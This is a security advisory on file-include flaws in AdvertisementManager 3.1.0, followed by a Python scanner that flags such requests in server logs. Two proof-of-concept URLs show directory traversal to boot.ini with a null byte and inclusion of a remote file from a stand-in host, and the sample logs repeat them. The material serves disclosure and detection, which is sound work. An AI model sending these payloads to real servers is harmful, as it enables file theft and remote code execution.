Vendor: AdvertisementManager
By: indoushka
CVSS: 7.5 (HIGH)
CWE: Local and remote file-include vulnerabilities
Product Name: AdvertisementManager
Affected Version From: 3.1.2000
Affected Version To:
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

AdvertisementManager local and remote file-include vulnerabilities

The AdvertisementManager application fails to sufficiently sanitize user-supplied input, leading to local and remote file-include vulnerabilities. Exploiting these vulnerabilities may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer.

Mitigation:

Proper input validation and sanitization should be implemented to prevent file-include vulnerabilities. Regularly updating the AdvertisementManager application to the latest version is also recommended.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/44165/info

AdvertisementManager is prone to local and remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.

AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt?
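
For defenders reviewing web server logs, the sketch below flags requests whose `req` parameter carries the patterns seen in the two URLs above: directory traversal, a trailing null byte, or a full URL. It is an added example, not code from the advisory or from AdvertisementManager; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Oct/2010:10:01:02 +0000] "GET /Advertisement/cgi/index.php?req=stats HTTP/1.1" 200 512
198.51.100.9 - - [12/Oct/2010:10:01:09 +0000] "GET /Advertisement/cgi/index.php?admin=Enter&req=../../../../boot.ini%00 HTTP/1.1" 200 731
198.51.100.9 - - [12/Oct/2010:10:01:15 +0000] "GET /Advertisement/cgi/index.php?admin=Enter&req=http://www.example.com/c.txt? HTTP/1.1" 200 98
198.51.100.9 - - [12/Oct/2010:10:01:20 +0000] "GET /Advertisement/cgi/index.php?req=%252e%252e%252fconfig HTTP/1.1" 200 98
"""
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.I)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_req(value):
    """Return the reasons a `req` value looks like a file-include attempt."""
    v = fully_decode(value)
    reasons = []
    if "\x00" in v:                                   # null byte in the value
        reasons.append("null-byte")
    if re.search(r'(^|[\\/])\.\.([\\/]|$)', v):       # ../ or ..\ path segment
        reasons.append("traversal")
    if SCHEME_RE.match(v) or v.startswith("//"):      # scheme: or //host prefix
        reasons.append("remote-url")
    return reasons

def scan(log_text, param="req"):
    """Return [(line_no, reasons)] for log lines with a suspicious `param`."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            reasons = classify_req(value)
            if reasons:
                hits.append((n, reasons))
    return hits
```

The same `classify_req` checks can back a request filter in front of the application, but an allow-list of permitted `req` values on the server side is the more robust control.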